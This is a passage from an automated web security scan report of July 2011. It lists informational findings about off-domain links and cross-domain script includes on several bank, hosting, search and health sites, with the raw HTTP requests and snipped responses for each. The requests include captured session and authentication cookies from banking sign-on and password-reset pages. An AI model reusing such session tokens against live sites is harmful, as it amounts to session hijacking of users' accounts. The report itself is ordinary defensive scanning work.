       <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

14.6. https://secure.codero.com/order/v/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/shop

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /order/v/shop?cart=empty HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037236103:ss=1311037201593; orderformv1=9p25frmj6slceji5v0d7oe4u42

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:49 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: UBERSID=rfugnf2bmkoul17ds1inessum5; path=/; HttpOnly
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 17822
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--Header Start-->
   <m
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsk7l4il00000wwytasjl7cu_1n7o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/></div>
...[SNIP]...

14.7. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; TLTSID=687AC65EB1EB10B1991EF87992750532

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:27 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!
...[SNIP]...
</script>

<link href="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/styles/signon.css.jsp" rel="stylesheet" type="text/css" media="screen" />


<!-- favicon -->
...[SNIP]...
<a href="http://www.wellsfargo.com/"><img src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/images/decorative/logo.gif" alt="Wells Fargo" width="62" border="0" height="62" id="logo"/></a>
...[SNIP]...
<a href="http://www.wellsfargo.com/com/comintro.jhtml"><img src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/images/signon/return_to_comm_svcs.gif" alt="Return to Commercial Services" width="11" border="0" height="11"/></a>
...[SNIP]...
<div>
<img src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/images/signon/signon_ceo_title.gif" width="207" height="12" border="0" alt="Commercial Electronic Office&reg;" />
</div>
...[SNIP]...
</form>


<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/wria/1.3.1-sp1/jslib/wria-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.SignonHelper.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.BookmarksChooser.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.PMFP.js"></script>
...[SNIP]...

14.8. http://www.bing.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /ScriptResource.axd

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ScriptResource.axd?d=HCasM9I2voxsTT3XtVOiUE0QIuS6zTbyuppihdKiTmgm8T3A8R3n4Y3knRHtffbtaMQduaY2sFW49ENLWRdTy0h2P3CbJTqRu25_-ntiIEE1&t=ffffffffec2d9970 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 18027
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,86.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,88.1')">Hotmail</a>
...[SNIP]...
<li>Find more search tips in <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" onmousedown="return si_T('&amp;ID=FD,109.1')">Help</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,99.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,101.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,103.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,105.1')">About our ads</a>
...[SNIP]...

14.9. http://www.bing.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /WebResource.axd?d=ZFK1T_0LduzipRNw8-MVJA2&t=633802405995006876 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 17938
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,86.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,88.1')">Hotmail</a>
...[SNIP]...
<li>Find more search tips in <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" onmousedown="return si_T('&amp;ID=FD,109.1')">Help</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,99.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,101.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,103.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,105.1')">About our ads</a>
...[SNIP]...

14.10. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
<link rel="stylesheet" type="text/css"
       href="http://www.healthcentral.com/common/cf/themes/hctemplate/ui/lib/jcarousel/skins/hc/skin.css" />
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript"
   src="http://s7.addthis.com/js/250/addthis_widget.js#username=healthcentral">
</script>
...[SNIP]...
<li class="first"><a href="http://www.addthis.com/bookmark.php"
           class="addthis_button_email">
<img
               src="http://www.healthcentral.com/common/images/icons/page_tools/email.gif"
               width="16" height="16" border="0" alt="email" />
...[SNIP]...
<div>
               <a href="http://www.addthis.com/bookmark.php"
                   class="addthis_button_email">
Email</a>
...[SNIP]...
</script>
Share this:
<a href="http://www.facebook.com/share.php"
   onclick="popupCenter('http://www.facebook.com/share.php?u=http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/','Facebook', 600, 400); return false;">

   <img height="16" width="16" src="http://www.healthcentral.com/common/images/icons/page_tools/facebook.gif" alt="fb">
...[SNIP]...
</a>
<a href="http://twitter.com/share"
   onclick="popupCenter('http://twitter.com/share?url=http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/&source=tweetbutton&text=Hypersensitivity to Noise, Touch & Smell','Twitter',600, 400); return false;">

   <img height="16" width="16" src="http://www.healthcentral.com/common/images/icons/page_tools/twitter.gif" alt="twit">
...[SNIP]...
<li class="first emailthis"><a href="http://www.addthis.com/bookmark.php" class="addthis_button_email">
   <img src="http://www.healthcentral.com/common/images/icons/page_tools/email.gif" width="16" height="16" border="0" alt="email"/>
...[SNIP]...
<div>
   <a href="http://www.addthis.com/bookmark.php" class="addthis_button_email">Email</a>
...[SNIP]...
<li style="float: left; padding-top: 13px;">
<a target="_blank" href="http://www.truste.org/ivalidate.php?url=www.healthcentral.com&amp;sealid=101"><img height="33" width="120" alt="TRUSTe Certified Privacy" src="http://www.healthcentral.com/common/images/home/feat_truste.gif">
...[SNIP]...
<li class="honimg">
<a target="_blank" href="https://www.hon.ch/HONcode/Conduct.html?HONConduct345456"><img height="60" width="43" alt="This website is accredited by Health On the Net Foundation. Click to verify." src="https://www.honcode.ch/HONcode/Seal/HONConduct345456_s1.gif"></a>
</li>
<li class="hontxt">
<a target="_blank" href="https://www.hon.ch/HONcode/Conduct.html?HONConduct345456">We comply with the HONcode standard for<br>
...[SNIP]...
<noscript>
<iframe leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" scrolling="No" frameborder="0" height="1" width="1" src="http://view.atdmt.com/iaction/MSFT_Health_Central_Extended_Data/v3/ato.ORDERID/[atc1.healthnoscript/atc2.healthnoscript/atc3.healthnoscript]"></iframe>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6035874&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
</script><script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js?load=effects,controls" type="text/javascript"></script>
...[SNIP]...

14.11. https://www.wellsfargo.com/locator/atm/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /locator/atm/search?txtCity=&selState=&user=wb&txtZip1=10010 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:51:23 GMT
Content-type: text/html; charset=ISO-8859-1
Content-Length: 30236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
...[SNIP]...
<div id="utilities"><a href="https://www.wachovia.com/" class="headerTopOn" tabindex="1">Back to Wachovia.com</a> | <a href="https://www.wachovia.com/helpcenter" tabindex="1">Customer Service</a>
...[SNIP]...
<div id="contentCol">
       

<script type="text/javascript" src="https://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&mkt=en-us&s=1"></script>
...[SNIP]...
<br />            
           <a href="https://www.wachovia.com/foundation/v/index.jsp?vgnextoid=98fd9e05d1674210VgnVCM200000627d6fa2RCRD&intcid=WF_LOC_BNR_R_DPS_CHK_22201_234x84_01T"><img src="/img/locator/cbd_checkinglocator_234x84.gif" alt="Checking account choices. Select the account that works best for you. Learn More" class="adv"/>
...[SNIP]...

15. Cross-domain script include
There are 16 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


15.1. https://onlineservices.wachovia.com/auth/AuthService

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /auth/AuthService?action=presentLogin&logincode=brokerageWachsec&url=https%3a//wachseconline.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069189096-New%7C1342605189096%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:53 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 16325

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta http-equiv="Pragma" content="no-store">
<meta http-equiv="Pragma: no-store">
<meta http-equiv="Cache Control"
...[SNIP]...
</title>

<script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<!-- id="v2_disclaimer" -->

       
                               <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

15.2. https://onlineservices.wachovia.com/identity/IdentityMgr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:56 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 18355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />


   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
</script>

   
   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

15.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; TLTSID=687AC65EB1EB10B1991EF87992750532

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:27 GMT
Content-type: text/html; charset=UTF-8
